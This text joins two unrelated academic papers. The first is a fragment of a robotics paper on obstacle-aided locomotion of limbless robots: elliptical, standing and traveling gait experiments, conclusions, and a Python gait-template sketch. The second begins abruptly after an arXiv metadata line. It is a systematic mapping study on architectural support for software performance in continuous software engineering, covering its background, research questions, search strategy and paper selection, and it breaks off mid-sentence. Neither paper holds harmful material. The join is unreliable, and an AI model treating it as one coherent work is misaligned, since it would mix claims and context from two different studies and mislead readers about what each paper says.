We first test gaits with varying eccentricity. Specifically, we prescribe the reduced shape variables as \(w_{1}(t)=w_{m}\sin{(\omega t)}\), \(w_{2}(t)=w_{m}\cos{(\omega t+\phi)}\), where \(\omega\) is the temporal frequency, \(w_{m}\) is the amplitude, and \(\phi\) controls the eccentricity. As illustrated in Fig. 5c, varying \(\phi\) facilitates the transition from a standing wave (\(\phi=0\)) to a traveling wave (\(\phi=\pi/2\)) in the shape space. In our theoretical analysis (Sec. III), we predict that \(\phi=\pi/4\) gives the best OAL performance. We tested gaits with different \(\phi\) among sparsely-distributed obstacles and observed that \(\phi=\pi/4\) indeed outperforms the other gaits, including the standing wave and the traveling wave (Fig. 7). To explore the principle behind the advantage of the elliptical gaits, we measured the duration of obstacle contact in these experiments. Here, we defined the duration of contact as the average fraction of the gait period during which the robot interacts with obstacles, \(\tau/T\), where \(\tau\) is the empirically measured average contact duration (Fig. 8) and \(T\) is the gait period. We notice that the contact duration in the standing-wave gait is significantly lower than in the elliptical-wave and traveling-wave gaits, indicating that the standing-wave gait has the lowest duration of beneficial contact between robot and obstacle. We also measured the attack angle between the robot and the obstacle, defined as the angle between the head link and the obstacle at the end of the robot-obstacle interaction. As posited by [19], a larger attack angle indicates a greater push from the obstacle on the robot.

Fig. 7: **Robophysical OAL experiments** (a) Sparsely distributed obstacles. (_a.Top_) OAL performance as a function of \(\phi\) (for fixed \(\theta=\pi/4\)). Elliptical gaits (\(\phi\sim\pi/4\)) lead to the best OAL performance. (i) Snapshots of the robot executing elliptical gaits (\(\phi=\pi/4\)) among sparsely distributed obstacles. (_a.Bottom_) OAL performance as a function of \(\theta\) (for fixed \(\phi=\pi/4\)). The elliptical orientation \(\theta=\pi/4\) leads to the best OAL performance. (ii) Snapshots of the robot executing uncoordinated elliptical gaits (\(\theta=0\)) among sparsely distributed obstacles. (b) Densely distributed obstacles. OAL performance as a function of \(\phi\). Circular gaits (\(\phi=\pi/2\)) lead to the best OAL performance. (iii) Snapshots of the robot executing traveling-wave gaits (\(\phi=\pi/2\)) among densely distributed obstacles.
As shown in Fig. 7, the attack angles in the traveling-wave gait are significantly lower than in the elliptical and standing-wave gaits, indicating that the traveling-wave gait takes the least advantage of the obstacle.

#### VI-C2 Varying ellipse orientation

We further explore the optimal ellipse orientation. Consider an elliptical gait with \(\phi=\pi/4\). We define \(\theta\) as the angle between the long axis and the horizontal axis. We illustrate example gaits with \(\theta=\{0.45\pi,\ 0.7\pi\}\) in Fig. 5c. From our theoretical analysis (Sec. III), we predict that \(\theta=\pi/4\) yields the optimal OAL performance. Robophysical experiments verified our prediction that \(\theta=\pi/4\) causes the best OAL performance.

### _OAL with densely distributed obstacles_

We next explore OAL among densely distributed obstacles. We constructed a densely-distributed obstacle-rich environment in which the robot inevitably encounters multiple obstacles. We tested gaits with varying \(\phi\) among densely-distributed obstacles and observed that traveling-wave gaits (\(\phi=\pi/2\)) cause the best OAL performance (Fig. 7). We acknowledge that to effectively navigate in environments with many obstacles, sensing and/or compliance is typically required [40, 38]. Since our analysis in Sec. IV is limited to open-loop gait-level design, the large variation in our experiments is expected. To explore the physical principles behind the advantage of traveling-wave gaits, we examine the interaction profile between the robot and the obstacles. As predicted in our theoretical analysis (Sec. IV), effective OAL in traveling-wave gaits results from the combined effects of multiple obstacles restricting the lateral and rotational oscillation of the central body axis. Therefore, there is no clear definition of "beneficial" or "detrimental" obstacles in traveling-wave gaits. As illustrated in Fig. 9, interactions between the robot and obstacles are mostly perpendicular to the direction of motion (and are therefore considered "neutral") in traveling-wave gaits. On the other hand, effective OAL for elliptical and standing waves relies more on the interaction with a single obstacle; the OAL performance of elliptical and standing waves is therefore sensitive to the distribution of obstacles. Following this idea, we record the probability of the robot interacting with a "detrimental" obstacle (\(p_{d}\)) for the traveling, elliptical, and standing gait templates. We notice that \(p_{d}\) increases as \(\phi\) increases (Fig. 9). Moreover, once the robot interacts with a detrimental obstacle, the probability of escaping decreases as \(\phi\) decreases (Fig. 9).

## VII Discussion and Conclusion

In this paper, we expanded the scope of geometric mechanics to heterogeneous environments.
Specifically, we established a novel model that maps the presence of an obstacle in position space to constraints in shape space. In doing so, we illustrate that (1) there exists a threshold obstacle spacing below which OAL is likely not effective; (2) lateral forces from obstacles can also contribute to forward displacement via the Lie bracket effect; (3) elliptical-wave gaits (\(\phi=\pi/4\), \(\theta=\pi/4\)) are specialized for locomotion among sparsely-distributed obstacles; and (4) traveling-wave gaits (\(\phi=\pi/2\)) are specialized for locomotion among densely-distributed obstacles. Our predictions are verified in robophysical experiments. This paper focused on the open-loop gait-level design for OAL. We acknowledge that gait-level design is in general not sufficient for effective OAL, especially among densely Fig. 8: **Advantage of elliptical gaits** (a) Snapshots of robots executing (_top_) standing wave, (_mid_) elliptical wave, and (_bottom_) traveling wave locomotion among sparsely-distributed obstacles. Attack angle and contact duration are labelled. (b) (_top_) Attack angle as a function of \(\phi\). Traveling wave (\(\phi=\pi/2\)) have significantly lower attack angle than standing wave (\(\phi=0\)) and elliptical wave (\(\phi=\pi/4\)). (_Bottom_) Contact fraction as a function of \(\phi\). Standing wave have significantly lower attack angle than traveling wave and elliptical wave. Fig. 9: **Beneficial obstacles.** (_Left_) Snapshots of traveling wave (_top_) and standing wave (_bottom_) locomotion among densely-distributed obstacles. Beneficial, detrimental, and neutral obstacles are labeled. (_Right_) \(p_{d}\), the probability of encountering detrimental obstacles, plotted as a function of \(\phi\). \(p_{d}\) decreases as \(\phi\) increases. distributed obstacles. However, we believe that proper gait design can simplify necessary controls (e.g., passive body dynamics Wang et al. [42] and sensor-based feedback controls) for OAL. In concurrent work, it is illustrated that with the help of passive body dynamics, our framework helps facilitate effective OAL in various obstacle-rich environments. Apart from forward locomotion, our framework can also apply to studying turning behavior in obstacle-rich environments. For example, prior work indicates that the omega turn [39] emerges to be a robust turning gait, especially in obstacle-rich environments; Wang et al. [41] show that the presence of obstacles can even aid turning behaviors in limbless robots. We suspect that omega turn gaits can benefit from interaction with obstacles because of the kinematic properties of their gait trajectories. In future work, we aim to use our OAL framework to analyze the turning behaviors in limbless robots. In doing so, our framework paves the way toward machines that can traverse complex environments and facilitates understanding of biological locomotion.
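As a concrete illustration of the gait templates discussed in Sec. VI, the following sketch generates joint-angle trajectories for the standing-wave, elliptical, and traveling-wave templates from the reduced shape variables \(w_{1}(t)=w_{m}\sin(\omega t)\), \(w_{2}(t)=w_{m}\cos(\omega t+\phi)\); the amplitude, frequency, joint count, sinusoidal basis, and the way the orientation \(\theta\) is imposed are hypothetical placeholders rather than the exact robot parameters.

```python
import numpy as np

N_JOINTS = 6          # yaw joints actuated for planar motion (placeholder)
W_M      = 1.0        # joint-angle amplitude (placeholder, rad)
OMEGA    = 2 * np.pi  # temporal frequency (placeholder, rad/s)
K_WAVES  = 1.0        # number of spatial waves on the body (assumed)

def reduced_shape(t, phi):
    """Reduced shape variables w1, w2 from Sec. VI (phi sets the eccentricity)."""
    return W_M * np.sin(OMEGA * t), W_M * np.cos(OMEGA * t + phi)

def joint_angles(t, phi, theta=np.pi / 4):
    """Map (w1, w2) to yaw joint angles through an assumed sinusoidal basis.

    The rotation by theta is one possible way to impose the ellipse
    orientation in the shape space; the parametrization used on the robot
    is not reproduced here.
    """
    w1, w2 = reduced_shape(t, phi)
    w1r = np.cos(theta) * w1 - np.sin(theta) * w2
    w2r = np.sin(theta) * w1 + np.cos(theta) * w2
    j = np.arange(N_JOINTS)
    basis1 = np.sin(2 * np.pi * K_WAVES * j / N_JOINTS)
    basis2 = np.cos(2 * np.pi * K_WAVES * j / N_JOINTS)
    return w1r * basis1 + w2r * basis2

templates = {"standing": 0.0, "elliptical": np.pi / 4, "traveling": np.pi / 2}
for name, phi in templates.items():
    print(name, np.round(joint_angles(0.25, phi), 2))
```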
2304.02489
Architectural Support for Software Performance in Continuous Software Engineering: A Systematic Mapping Study
The continuous software engineering paradigm is gaining popularity in modern development practices, where the interleaving of design and runtime activities is induced by the continuous evolution of software systems. In this context, performance assessment is not easy, but recent studies have shown that architectural models evolving with the software can support this goal. In this paper, we present a mapping study aimed at classifying existing scientific contributions that deal with the architectural support for performance-targeted continuous software engineering. We have applied the systematic mapping methodology to an initial set of 215 potentially relevant papers and selected 66 primary studies that we have analyzed to characterize and classify the current state of research. This classification helps to focus on the main aspects that are being considered in this domain and, mostly, on the emerging findings and implications for future research.
Romina Eramo, Michele Tucci, Daniele Di Pompeo, Vittorio Cortellessa, Antinisca Di Marco, Davide Taibi
2023-04-05T15:03:06Z
http://arxiv.org/abs/2304.02489v1
# Architectural Support for Software Performance ###### Abstract The continuous software engineering paradigm is gaining popularity in modern development practices, where the interleaving of design and runtime activities is induced by the continuous evolution of software systems. In this context, performance assessment is not easy, but recent studies have shown that architectural models evolving with the software can support this goal. In this paper, we present a mapping study aimed at classifying existing scientific contributions that deal with the architectural support for performance-targeted continuous software engineering. We have applied the systematic mapping methodology to an initial set of 215 potentially relevant papers and selected \(66\) primary studies that we have analyzed to characterize and classify the current state of research. This classification helps to focus on the main aspects that are being considered in this domain and, mostly, on the emerging findings and implications for future research. keywords: Software Architecture, Software Performance, Continuous Software Engineering, DevOps + Footnote †: journal: Journal of Systems and Software ## 1 Introduction Continuous software engineering (CSE) is a promising software process that interleaves business strategy (i.e., requirement engineering), development, and operations on a continuum. It aims to produce a better software product and create more successful implementations that satisfy the relevant requirements and constraints. Similarly, the recent emphasis on DevOps recognizes that the integration between software development and its operational distribution must be continuous. DevOps improves end-to-end collaboration between the stakeholders, development, and operations teams. In addition, they have been successfully employed in disciplines such as security and testing. Software performance (SP) is an essential quality aspect for the adoption and success of a software system. Researchers and industry practitioners have identified the importance of integrating performance engineering practices in continuous development processes in a timely and efficient way [1]. However, current software performance engineering methods are not tailored for environments using CSE processes and practices are lagging [2; 3]. Although SP is a non-functional property related to the platform on which the software is deployed, performance assessment, in the last two decades, has been mainly estimated at the design level through methods, such as software architecture (SA) [4; 5; 6]. SAs can be transformed into performance models, whose indices can be exploited to compare SA alternatives. Such a design-time performance assessment does not extensively consider several aspects of the target platform characteristics. However, these early-stage comparative analyses that show differences evident in the alternative results certainly support architects to make decisions with an enhanced view of their performance effects. The rise of the continuous engineering paradigm has substantially changed in the last decade of the software process. More often, it is nowadays required that software engineering follows a continuous loop between the running code and design models such that these two sides of the process can reciprocally feed each other [7]. For example, runtime data can be collected from execution traces to feed software models. Software models are then aimed at checking either functional or non-functional properties. 
The analysis of software models in the context of incoming execution scenarios can suggest just-in-time refactoring/adaptation actions that keep the software behavior acceptable when these scenarios occur [8; 9; 10]. In the context of CSE processes, architectural models appear to have gained relevance, among others, for supporting performance-related decisions [11]. Despite rising interest in embracing the continuous architect ing approaches and performance engineering practices, there has been a little consensus in the literature on the appropriateness of different performance engineering techniques that can be used in a continuous engineering process. A limited number of studies that consider continuous engineering in some specific aspects of self-adaptive systems and microservices have been published [12; 13; 14; 15; 16]. However, current CSE and DevOps practices focus on rapid delivery, minimizing time to release for new features, mitigating risks, driving new efficiencies, and establishing a continuous delivery pipeline. Efficient and automated performance engineering tools are critical and pose relevant challenges in accomplishing this mission. Thus, there is still a need for a study that systematically investigates all the key publications on this topic and identifies possible performance engineering techniques applicable to continuous engineering processes. In this study, we conduct a mapping study of the existing literature [17] to investigate the contributions of the scientific community to architectural support for SP within CSE. Furthermore, the study aims to characterize and classify the current research scenario to better structure our understanding of the topic and identify research directions worth investigating in this domain soon. The main contributions of this study include: * A reusable framework for classifying, comparing, and evaluating solutions, methods, and techniques specific to architectural support for software performance in continuous software engineering; * A systematic map of the state of research in the domain of architectural support for SP in CSE in terms of the performance areas, domains, addressed problems, and adopted instruments; * A discussion of the emerging trends, gaps in the literature, and their implications for future research. The remainder of this paper is organized as follows: In Section 2, we provide a background review and compare the existing literature. In Section 3, we define our target question and illustrate the process that we have adopted to conduct the mapping study; In Sections 4-8, we describe and analyze the results obtained to answer our target questions. In Section 9, we discuss the threats to validity of our study, and finally, Section 10 presents the concluding remarks. ## 2 Background and Related Work This section provides some background information and presents the synergies among the main concepts involved; other studies on related topics are also presented in this section. ### Main concepts **Continuous Software Engineering (CSE)**. This refers to the capability to develop, release, and learn from software in rapid parallel cycles. This includes determining new functionality to build, evolve and refactor the architecture, develop the functionality, validate it, release it to customers and collect experimental feedback from the customers to inform the next cycle of development [18]. 
The definition of CSE is prone to interpretations and is often used in conjunction with other continuous activities that emerge during the entire software (engineering) lifecycle [7]. In particular, the activities considered in the _development_ phase are: continuous integration, continuous deployment/release, continuous delivery, and continuous verification/testing. Whereas, the _operation_ phase concerns the end of the process, where handover of the release is initiated; in this phase, particular attention is devoted to the continuous use of these systems, after the initial adoption, as well as continuous monitoring, to observe and detect compliance issues and risks. The most recent stand out of the _DevOps_[19] practices, which promote the integration between development and operations, confirms that these areas are closely interact to achieve CSE. Finally, a closer and continuous linkage between business management and software development functions is also necessary to benefit activities such as business planning; the _BizDev_[7] phenomenon complements DevOps, integrating business management with software development and operations functions. **Software Performance (SP)**. This represents the entire collection of software engineering activities and related analyses used throughout the software development cycle, which are directed at meeting performance requirements [20]. This field focuses on the quantitative evaluation of modern software systems (e.g., data-intensive, autonomous, distributed, adaptive, and embedded systems) and trade-offs between performance and other quality of service (QoS) attributes (e.g., security, reliability, and availability). In the last few decades, numerous performance engineering methods, methodologies, and techniques have been developed for system evaluation [21]. SP assessment is a crucial task in software engineering to ensure that a new software release does not impair the user-perceived performance. Performance degradation can occur in various forms, such as high response time latency, low throughput, and excessive resource utilization. Although these arguments would suggest that performance should be assessed on every change, recent studies on continuous engineering shows that it is not standard practice yet [22]. **Software Architecture (SA)**. The SA of a software system is the structure or structures of the system, which comprise software components, the externally visible properties of those components, and the relationships among them [23]. SA is often the first design artifact to represent decisions on how the requirements of all types are to be achieved. It shows the correspondence between the requirements and the constructed system, thereby providing a rationale for the design decisions [24]. The design of the overall system structure, particularly in large and complex systems, is an essential factor. For instance, performance depends largely upon the complexity of the required communication, coordination, or cooperation among the different components, particularly in complex distributed systems. The need for SA evaluation is based on the realization that software development, similar to all engineering disciplines, is a process of continuous modeling and refinement. Detecting architectural problems before the bulk of the development work is completed allows re-architecting activities to take place in due time without to rework what has already been done. 
At the same time, tuning activities enhance and maintain the SP during the software lifetime [25]. **Synergies between CSE, SP, and SA.** CSE involves several challenges in terms of SA evolution and the detection/resolution of problems related to software quality attributes, such as performance [7]. Software development, in practice, concerns the continuous evolution of software, primarily owing to new incoming requirements. It is possible that SA is not adequate to embed new required functionalities, thus imposing a heavy and complex software evolution. This is compounded by situations in which the original developers are no longer available. In such cases, the system maintainability is strongly related to its architecture [26]. With continuous engineering practices, developers have greater control and visibility of defects and to access the quality attributes states, enabling them to remedy any potential issues during the system development. Interactions between designing and run-time in software engineering allow for dynamic adaptation and ensure non-functional properties and end-user expectations [27]. Notably, continuous monitoring is considered an enabler for the early detection of QoS problems, such as performance degradation [28]. Figure 1 illustrates the context of this study. We considered the holistic view of the CSE proposed in [7] and tailored the figure by focusing only on the continuous activities that are central to SP (in the white rectangles) and by adding the specific task of performance assessment (in the light blue rectangle). This figure also shows the bridge artifacts between CSE and SP. SA and runtime data are output artifacts of CSE that feed THE SP, whereas refactoring enters the CSE. SA is the abstraction that represents the best trade-off between model complexity and expressiveness and allows the assessment of the performance characteristics of a (software) system. Runtime data represents the running system that provides all parameters to set the performance model defined by the SA. Refactoring consists of suggestions on how to change the software system to solve or mitigate performance degradation. Based on the above tailoring, we formulate a query to extract the literature object of our analysis. ### Related works In this section, we discuss secondary studies that somehow address the role of SA and SP in the CSE paradigm. Koziolek [12] conducted a holistic literature review classifying the approaches concerning performance prediction and measurement for component-based software systems based on studies published from 1999 to 2009. These approaches introduce specialised modelling languages for the performance of software components and aim to understand the performance of a designed architecture instead of code-centric performance fixes. The review acknowledges the limited support for the runtime life-cycle stage of software components and the lack of consensus on the performance modeling language. In fact, none of the reviewed approaches was ready to gain widespread use due to limited tool support, fundamental in the case of CSE. The surveyed methods support modelling the runtime life-cycle stage of software components only in a limited way (i.e., they only included the workload and the usage profile modeling of the component-based system at runtime). For continuous performance improvement, dynamic software refactoring is of paramount importance. 
However, the reviewed primary studies in [12] partially supported dynamic and automated mechanisms for CSE for performance aspects. Furthermore, online performance monitoring at runtime was not fully combined with modelling techniques to react on changing usage profiles and deployment environments. As an extension of the review published by Koziolek [12], we present an updated analysis of the literature in our study including papers published until February 2022. Differently from [12], our work focuses on publications investigating performance engineering methods that can be applied in the context of CSE and considering approaches applicable to all kind of systems without limiting our study to component-based software systems. In a subsequent holistic literature review, Becker et al. [13] specifically investigated model-driven performance engineering approaches for self-adaptive systems based on studies published from 2004 to 2011. The authors provided a thorough classification scheme, presented as a feature diagram. They distinguished between the reactive and proactive adaptation strategies, and they derived two main categories of adaptation: design-time and run-time. Self-adaptation is the ability of the system to decide autonomously (i.e., without or with minimal human intervention) how to adapt to accommodate changes in its context and environment, and to manage the uncertainty in the environment in which the software is deployed, and during the execution [29]. Self-adaption is enabled since the self-adaptive systems use an explicit representation of their own structure, behavior, and goals [30]. Recent efforts have been devoted to investigating motivation and the application of self-adaptation in practice [31]. In this context, CSE defines a continuous engineering process needed to quickly respond to market and customer new requirements, i.e., to build solutions that much more accurately Figure 1: Overview of the considered context align with dynamic customer needs [32]. A number of continuous activities (such as continuous monitoring, continuous integration, and so on) are part of an overall CSE [33]. CSE and (self-)adaptation are two different run-time mechanisms in the sense that self-adaptation is the ability of a system to manage changes and uncertainty, while CSE is a dynamic process that continuously engineers the system allowing to add new features, functionalities, and abilities, or new smarter implementations of them. While the aforementioned study (i.e., [13]) consistently outlines performance engineering in self-adaptation targeting model-driven performance approaches, we seek to extend the area of interest to a more general interleaving of runtime knowledge and architectural models in CSE, without limiting the study to model-driven performance approaches. Recently, different studies have covered the different aspects of CSE [14; 15; 16] in several contexts. However, differently from our work, they did not specifically consider SP engineering. Pahl et al. [14] have presented a systematic mapping study of 21 papers published from 2014 to 2015 to identify, taxonomically classify, and systematically compare the existing research body on microservices and their application in the cloud, by positioning them within the context of continuous development. Taibi et al. [15] have presented a systematic mapping study of continuous architecture with microservices and DevOps, and included 23 studies published from 2014 to 2017 in their investigation. 
They provided an overview of the architectural styles of microservices applications, highlighting the advantages and disadvantages of each style. However, no consideration was given to non-functional properties, such as performance. Jabbari et al. [16] presented a systematic mapping study on the classification of DevOps and included 49 papers published from 2011 to 2016. They investigated how DevOps was exploited during software development processes. They found that few primary studies exploited model-driven engineering techniques and focused on quality assurance. Finally, Bezemer et al. [34] conducted an industrial survey to gain insights into how performance is addressed in industrial DevOps settings. In particular, they have investigated the frequency of executing performance evaluations, the tools being used, the granularity of the performance data obtained, and the use of model-based techniques. In contrast to the aforementioned papers, in this paper, we execute a systematic mapping study that investigates how performance is assessed in the context of CSE by providing a classification schema able to classify primary studies concerning research areas, addressed target problems, provided contributions, devised methodologies, studied performance indices, and type of used data. Unlike other related work, the focus of this study is the combination of SA and SP within CSE. ## 3 Research Method To gain insights into the current research practices on the architectural support for SP within CSE, we conducted a systematic mapping study of the literature based on the guidelines proposed by Petersen et al. [17], and the "snowballing" process defined by Wohlin [35]. The process adopted in this study consists of five steps, as shown in Figure 2. In the first step, we _define the research questions_ and identify the scope of the review to be incorporated in the next steps. Subsequently, we _conduct a literature search_ to retrieve a list of relevant publications that are then selected by applying the inclusion and exclusion criteria in the _papers selection_ step. The selected publications are the input for the _data extraction_, where we categorize the relevant publications by considering their full text. As output, we obtain a classification schema that is used as input for _mapping the data retrieved from the papers_ to the questions. In the following section, we describe the five aforementioned steps of the mapping process. In Sections 4-8, we present the results of the analysis and mapping of the papers. Moreover, to simplify the replicability of this study, a complete replication package is made publicly available [36]. ### Defining research questions To investigate the contributions of the scientific community on the architectural support for SP within CSE, we formulated the following research questions: _RQ1: What **research areas** and **target systems** have been investigated?_. The aim of this research question is two-fold: _i)_ to highlight the research areas that are focused on providing solutions in this field; and _ii)_ to extract the subject systems on which the application or technique is intended to apply (we refer to this by the term "target system" [37; 38]). The rationale for this RQ is strongly related to the goal of this study and it aims to define how and what degree of performance engineering is exploited in CSE. It also determines which application domains have been considered in the selected studies. 
This helps us to understand the maturity of continuous performance assessment and to determine the applications for which performance is considered a key constraint. _RQ2: What and how **performance problems** have been addressed?_. This research question focuses on the identification of the SP engineering problems targeted in a CSE process and the solutions proposed to address them. Several issues can be addressed in SP engineering, including requirement specification, modeling, analysis, prediction, and suggestions to improve the software system performance. The rationale behind this RQ is strictly related to the identification of the SP target problems considered by the researchers and the related contributions proposed in the context of CSE. _RQ3: What **instruments** have been adopted?_. Several instruments can be used to address the performance issues. We partitioned these into three categories of keywords: input data, methodologies/techniques, and performance output measures/indices. The first category includes the types of data that are used to conduct the performance analysis, and spans from runtime data through requirements to software/performance models. Examples of the the second category are patterns/anti-patterns recognition, performance prediction or testing. The third category aims to identify the target metrics, such as response time, throughput and network bandwidth. This research question aims to identify which, and with what degree instruments have been applied in the context of CSE. The rationale behind this question is strictly related to determining the characteristics and limits of the proposed solutions in the SP and CSE domains. _RQ4: What are the gaps in current research **gaps** and the implications for future research?_. This research question combines the different viewpoints highlighted in the previous three RQs, and aims to identify contexts that have been hitherto most or least investigated. For example, how intensively has _performance assessment_ (as a problem) been investigated in the context of _continuous monitoring_ (as a research area) on _distributed systems_ (as a target)? We are particularly interested in highlighting combinations that exhibit low intensities. We expect that some of these combinations to raise negligible interest and others to represent research gaps. Moreover, we are focused on identifying areas worth investigating in the near future. ### Conducting search The search process involves the identification of search strings, the outline of the most relevant bibliographic sources and search terms, the definition of the inclusion and exclusion criteria, and the query execution. **Search strings**. We defined the search keywords based on the PICO1 terms [40] in our questions structure. As suggested by Kitchenham [40], the comparison and outcome terms cannot always be considered in software engineering if the research focuses on general investigation. hence, we extracted the keywords from the population and intervention terms. Footnote 1: PICO elements include: problem/patient/population, intervention/indicator, comparison, outcome [39]. We refined the search terms and the related search strings to ensure that relevant studies were returned by combining the keywords and reviewing the titles and abstracts of the search results. The final set of keywords is listed in Table 1. The resulting query was then adapted to the syntax of each bibliographic source. 
All the queries applied to the different bibliographic sources are reported in the replication package [36]. _("continuous software engineering" OR "continuous integration" OR "continuous deployment" OR "continuous development" OR "continuous improvement" OR DevOps OR "continuous evolution" OR "continuous monitoring") AND "software architecture" AND "software performance"_ **Bibliographic sources**. We selected a list of relevant bibliographic sources following the suggestions of Kitchenham and Charters [40], as these sources are recognized as the most representative in the software engineering domain and have been used in many reviews. The list includes: _ACM Digital Library_, _IEEEXplore Digital Library_, _Scopus_, and _Springer Link_. **Inclusion and exclusion criteria**. We defined the inclusion and exclusion criteria to be applied to the title and abstract (T/A) or to the full text (All), as reported in Table 2. **Search**. Finally, the search was conducted on March 1st, 2022, and all the publications available until then were included. The application of the search terms returned 215 papers, obtained by merging the papers from the considered bibliographic sources, as depicted on the left side of Figure 3. Upon removing the duplicate papers, we obtained 195 papers. We validated the search string with a "golden set" of papers to ensure that we did not leave out relevant works. The papers considered in the golden set were: [SP2], [SP9], [SP10], [SP12], [SP31], and [SP49]. ### Papers selection After obtaining the initial set of papers, we applied the selection process described in this section. An overview of this process, with the corresponding numbers, is depicted in Figure 3. **Testing the applicability of the inclusion and exclusion criteria.** Before applying the inclusion and exclusion criteria, all the authors tested their applicability iteratively on a subset of 20 randomly selected papers. Based on the disagreements and on a shared discussion, we clarified the inclusion and exclusion criteria. **Applying the inclusion and exclusion criteria to the title and abstract.** The refined criteria were applied to the remaining 195 papers (Table 2). We included papers that meet all the inclusion criteria and excluded those that meet any of the exclusion criteria. Each paper was read by two authors; in the case of disagreement, a third author helped to resolve it. For 32 papers, the authors discussed and resolved possible disagreements. Out of the 195 initial papers, we included 74 papers based on the title and abstract. The inter-rater agreement before the third author was involved was 0.75, obtained using Cohen's kappa coefficient, which indicated a substantial agreement between the authors [41].

Figure 3: Overview and numbers of the search and selection process.

**Snowballing.** We performed the snowballing process [35] by considering all the references presented in the retrieved papers and evaluating all the papers referencing the retrieved papers, which resulted in one additional relevant paper. We applied the same process to the papers retrieved from the initial search. The snowballing search was conducted in March 2022. We identified \(86\) potential papers, but only \(11\) were included (after applying the inclusion and exclusion criteria to the title and abstract) in the final set of publications that were subjected to full reading and data extraction.
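The inter-rater agreement reported here is Cohen's kappa. The small example below shows how the coefficient is computed from two authors' include/exclude decisions; the decisions are made up purely for illustration and are not the study's actual screening data.

```python
from collections import Counter

def cohens_kappa(rater_a, rater_b):
    """Cohen's kappa: (p_o - p_e) / (1 - p_e), where p_o is the observed
    agreement and p_e the agreement expected by chance from the marginals."""
    assert len(rater_a) == len(rater_b)
    n = len(rater_a)
    p_o = sum(a == b for a, b in zip(rater_a, rater_b)) / n
    pa, pb = Counter(rater_a), Counter(rater_b)
    labels = set(rater_a) | set(rater_b)
    p_e = sum((pa[l] / n) * (pb[l] / n) for l in labels)
    return (p_o - p_e) / (1 - p_e)

# Hypothetical include/exclude decisions by two authors on ten papers.
author_1 = ["in", "in", "out", "in", "out", "out", "in", "out", "in", "in"]
author_2 = ["in", "out", "out", "in", "out", "out", "in", "out", "in", "in"]
print(round(cohens_kappa(author_1, author_2), 2))   # 0.8 for this toy example
```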
**Full reading.** The screening of the remaining \(85\) papers was performed independently by two authors. We ensured that the papers were randomly assigned such that each author had a similar number of papers assigned. Moreover, we permuted the assignments to enable a good balance between each pair. We read the \(85\) papers in full and applied the criteria defined in Table 2. To improve the reliability of our study [42], we sought the services of a third author in two papers to reach a final decision. In this case, the inter-rater agreement before the third author was involved was strong (Cohen's kappa coefficient = 0.94; almost perfect agreement). Based on this process, we selected a total of \(66\) papers for the review. ### Data Extraction and Analysis To ensure a rigorous data extraction process and to ease the management of the extracted data, a well-structured classification framework was rigorously designed, as explained in this section. To answer our RQs, we extracted a set of information from the \(66\) selected papers. Notably, we defined the main concepts and corresponding data in our study by following a systematic process called _keywording_. The goal of this process is to effectively develop a classification scheme so that it fits the selected papers and considers their research focus into account [43]. In particular, we identified the codes for our coding schema using a semi-automated process in the following two steps: 1. _Automatic identification of the most recurrent keywords in the papers_. We used natural language processing (NLP) techniques to automatically identify the keywords that were most frequently mentioned in the abstracts of the selected papers. We started by collecting the abstracts from a single dataset that constituted the text corpus for the processing. The corpus was pre-processed in two phases: _noise removal_ and _normalization_. In the _noise removal_ phase, we performed an initial clean-up by converting the text to lowercase and by removing punctuations, tags, special characters, and digits. We then applied two normalization techniques: _stemming_ to remove suffixes and _lemmatization_ to group together words having the same root. As a final pre-processing step, we removed the prepositions, pronouns, and conjunctions. Thus, we created a vector of words counts by deriving a _bag-of-words_ model for the text. In this model, words order and grammar information are not considered because the entire text is represented by the multiset of its words from which one can derive their multiplicity. The vector of words counts was then used to obtain the 50 most frequent single words and two words (bi-grams) and three words (tri-gram) combinations. 2. _Manual refinement of the keywords._ We refined our collection of keywords and concepts by reading the abstract of each paper. We combined together keywords from different papers to develop a high level understanding of the nature and contribution of the research. This helped us to define a set of categories of keywords that is representative of the research questions. However, the paper abstracts were too limited to define all meaningful keywords. 
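A minimal, self-contained sketch of the automatic keyword identification described in step 1 above is given below; it follows the same sequence of noise removal, normalization, stop-word filtering, and n-gram counting over a bag-of-words model, but the sample abstracts, the stop-word list, and the crude suffix stripping are illustrative assumptions rather than the exact tooling used in this study.

```python
import re
from collections import Counter

STOP_WORDS = {"the", "a", "an", "of", "in", "on", "for", "and", "or", "to",
              "we", "is", "are", "this", "that", "with", "by", "as", "it"}

def preprocess(text):
    # Noise removal: lowercase, drop tags, punctuation, special characters, digits.
    text = re.sub(r"<[^>]+>", " ", text.lower())
    text = re.sub(r"[^a-z\s]", " ", text)
    tokens = text.split()
    # Normalization: a crude suffix-stripping stand-in for stemming/lemmatization
    # (a real pipeline would use, e.g., a Porter stemmer and a WordNet lemmatizer).
    tokens = [re.sub(r"(ing|ed|es|s)$", "", t) for t in tokens]
    # Remove stop words (prepositions, pronouns, conjunctions, ...).
    return [t for t in tokens if t and t not in STOP_WORDS]

def top_ngrams(docs, n, k=50):
    """Bag-of-words counts of n-grams over all documents; returns the k most frequent."""
    counts = Counter()
    for doc in docs:
        toks = preprocess(doc)
        counts.update(tuple(toks[i:i + n]) for i in range(len(toks) - n + 1))
    return counts.most_common(k)

# Hypothetical abstracts standing in for the corpus of selected papers.
abstracts = ["Continuous monitoring feeds performance models of the software architecture.",
             "We propose architectural support for software performance in DevOps pipelines."]
for n in (1, 2, 3):
    print(n, top_ngrams(abstracts, n, k=5))
```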
\begin{table} \begin{tabular}{l l l} \hline \hline **Population** & **P Terms** & **Step** \\ \hline Software Performance & software performance & All \\ \hline \hline **Intervention** & **I Terms** & \\ \hline Software Architecture & software architecture & \\ \hline Continuous Software Engineering & DevOps, continuous integration, continuous deployment, continuous development, continuous improvement, DevOps, continuous evolution, continuous monitoring & \\ \hline \hline \end{tabular} \end{table} Table 1: Definition of keywords \begin{table} \begin{tabular}{l l l} \hline \hline **Criteria** & **Assessment Criteria** & **Step** \\ \hline \multirow{4}{*}{Inclusion} & The paper covers software performance engineering issues & All \\ \cline{2-3} & The paper proposes model-based or architectural approaches for CSE/DevOps or contributes to (self-) adaptation/refactoring targeted & All \\ \cline{2-3} & to software performance & \\ \hline \multirow{4}{*}{Exclusion} & The paper is not fully written in English & T/A \\ \cline{2-3} & The paper is not peer-reviewed (i.e., blog, forum, etc.) & T/A \\ \cline{2-3} & The paper is a duplicate (only consider the most recent version) & T/A \\ \cline{2-3} & The paper is a position papers, book chapter or work plan (i.e., the paper does not report results) & T/A \\ \cline{2-3} & The paper does not fully or partly focus on software performance & All \\ \cline{2-3} & The paper does not fully or partly focus on software architecture or software engineering & All \\ \hline \hline \end{tabular} \end{table} Table 2: Inclusion and exclusion criteria Therefore, we thoroughly examined all the sections of the papers to 